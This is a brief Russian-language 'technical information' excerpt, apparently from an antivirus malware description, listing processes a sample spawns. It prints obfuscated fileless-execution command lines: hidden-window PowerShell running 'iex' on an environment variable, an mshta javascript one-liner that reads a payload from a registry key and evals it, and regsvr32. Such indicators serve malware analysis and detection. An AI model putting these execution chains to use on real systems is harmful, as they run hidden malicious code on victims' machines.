Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:nfxr' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' javascript:I4Bb5fKJW="48QD";A7F=new%20ActiveXObject("WScript.Shell");s6yRR="mk9fI";mexM5=A7F.RegRead("HKLM\\software\\Wow6432Node\\Bbp1rkSF\\HYzuJiud");YHAMSA8="gnG";eval(mexM5);zpm5q="unH9TJk"...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:nfxr
- '%WINDIR%\syswow64\regsvr32.exe'